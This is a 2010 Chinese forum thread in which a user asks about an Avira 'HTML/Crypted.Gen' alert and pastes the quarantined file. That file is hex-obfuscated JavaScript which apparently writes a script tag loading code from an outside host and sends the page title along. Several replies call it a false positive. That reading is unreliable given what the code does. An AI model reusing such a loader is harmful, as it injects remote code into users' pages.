发现病毒或恶意程序!——高手请进
北国游子
真诚、坦荡,狂热、执着,无怨无悔、嫉恶如仇
1楼 大 中 小 发表于 2010-5-8 13:34 只看该作者
发现病毒或恶意程序!——高手请进
8日几乎一整天,小红伞不停拦截:发现病毒或恶意程序!
并提示:包含 HTML/Crypted.Gen HTML 脚本病毒的识别模式
由于出现过于频繁,且均指向同一个位置,经查看,在IE临时文件夹中。但该位置文件无法用任何编辑软件打开,也无法复制。于是先在小红伞中将之隔离,再从隔离区恢复到另一个位置。该文件在IE临时文件夹中名为:116312516-notifierclient-
js_zh-CN[1].VIR
将该文件更名为文本文件,然后打开,内容如下:
var
_0x9713=[“\x3C\x73\x63\x72\x69\x70\x74\x20\x6C\x61\x6E\x67\x75\x61\x67\x65\x3D\x27\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x27\x20\x73\x72\x63\x3D\x27\x68\x74\x74\x70\x3A\x2F\x2F\x6D\x2E\x31\x37\x62\x62\x6A\x2E\x63\x6F\x6D\x2F\x6D\x77\x67\x6E\x64\x66\x61\x2E\x70\x68\x70\x3F\x73\x72\x63\x3D\x67\x67\x26\x74\x3D”,”\x74\x69\x74\x6C\x65”,”\x27\x3E\x3C\x2F\x73\x63\x72\x69\x70\x74\x3E”,”\x77\x72\x69\x74\x65”];document_0x9713[0x3];document.write(“<script
language=’javascript’
src=’http://talkgadget.google.com/talkgadget/sp/116312516-notifierclient-
js_zh-CN.js?rr=1886680168’><\/script>”);
将其中地址输入IE地址,执行后显示下载:116312516-notifierclient-js_zh-CN.js
该文件经小红伞扫描没有问题。
该地址主页为:Google Chat - Chat with family and friends
经搜索学习,“.VIR”文件是被杀毒软件标识的文件。那么,病毒程序是116312516-notifierclient-js_zh-
CN.js吗?可该文件小红伞扫描认为没有问题!
我能做的就这些了,希望高手给予指教!!
补充:
点击“发新话题”时,小红伞立刻拦截:发现病毒或恶意程序!
提示同上:包含 HTML/Crypted.Gen HTML 脚本病毒的识别模式
[ 本帖最后由 北国游子 于 2010-5-8 13:40 编辑 ]
Terminusbot 整理,讨论请前往 2049bbs.xyz
核子力量
Twitter.com/hzpower
2楼 大 中 小 发表于 2010-5-8 16:52 只看该作者
进安全模式全盘扫描一遍试试
02304H
10001100000100B
3楼 大 中 小 发表于 2010-5-8 17:01 只看该作者
查了一下,似乎是这个原因:
http://www.llsilver.com/invasion/xiaohongsan-HTML-Crypted.html
实话说这个解决方式挺矛盾的……
要是不扫临时文件夹的话,防护能力可是削弱了不少
还是得请善用伞的人士来讲解下怎么才能单独把这个屏蔽掉
北国游子
真诚、坦荡,狂热、执着,无怨无悔、嫉恶如仇
4楼 大 中 小 发表于 2010-5-9 01:38 只看该作者
原来并不真是病毒!
还真不好解决,排除IE临时文件夹,还真不放心。
每次提示的时候我选择删除或隔离,下面提示就不那么频繁了。但不知道那个JS文件到底是做什么的。
谢谢楼上!
imus
升斗小民
5楼 大 中 小 发表于 2010-5-9 01:42 只看该作者
我提供一个思路:
利用火狐浏览器的adblock plus插件
屏蔽有问题的js或者图片。
狗狗吃肉么浏览器下貌似也有相应的插件……
另外,本人用的是avast!
诺贝尔影帝
6楼 大 中 小 发表于 2010-5-9 08:52 只看该作者
没见过,请问楼主是去什么网站报错的?
按照那个解释“所有的1*1框架和wideth=0的框架”都会报毒,不知道有哪些网站是这样?
而且如此频繁出现,到现在小红伞不可能还在误报吧
我是用了一年多的C版小红伞,在数十台机子装过,但好像都没见过这个问题
北国游子
真诚、坦荡,狂热、执着,无怨无悔、嫉恶如仇
7楼 大 中 小 发表于 2010-5-9 10:13 只看该作者
我同时开着很多窗口,感觉应该就是http://www.google.com.hk/ig?hl=zh-
CN,但谷歌搜索我是默认打开的主页之一,只有那天出现这个情况。
02304H
10001100000100B
8楼 大 中 小 发表于 2010-5-9 10:49 只看该作者
回复 6楼 诺贝尔影帝 的话题
应该是小红伞对恶意网页定义过于宽泛的缘故……
虽然我用小红伞+firefox没有遇到这种情况
现在既然出中文版了, LZ你可以试试咨询官方
或者换avast吧
诺贝尔影帝
9楼 大 中 小 发表于 2010-5-9 16:21 只看该作者
我在ie8试过http://www.google.com.hk/ig?hl=zh-CN
没有任何问题,楼主是ie6?
我倒不觉得小红伞对恶意网页定义宽泛,小红伞被指误报多,主要还是一些破解软件、注册机之类。
高启发是会严格些,不够规范的网页是容易报毒,但不至于对Google的网页也误报吧。
PS:玩过一个小游戏,大丰收,小红伞一定报毒的,为了给老人玩,只有排除掉。
北国游子
真诚、坦荡,狂热、执着,无怨无悔、嫉恶如仇
10楼 大 中 小 发表于 2010-5-9 17:17 只看该作者
我是IE8。
也不确定是http://www.google.com.hk/ig?hl=zh-CN&refresh=1造成的,但小红伞的隔离文件中有这样一段:
encodeURIComponent(document[_0x9713[0x1]])+_0x9713[0x2]);document.write(“<script
language=’javascript’
src=’http://talkgadget.google.com/talkgadget/sp/116312516-notifierclient-
js_zh-CN.js?rr=1886680168’><\/script>”);
哪位高手可以解读
萧易寒
11楼 大 中 小 发表于 2010-5-11 10:45 只看该作者
回复 10楼 北国游子 的话题
有啥好解读的,google的js你还不信任?
库存袈裟
@bruceku 想象力比知识更重要。
12楼 大 中 小 发表于 2010-5-11 15:38 只看该作者
红伞最近误杀严重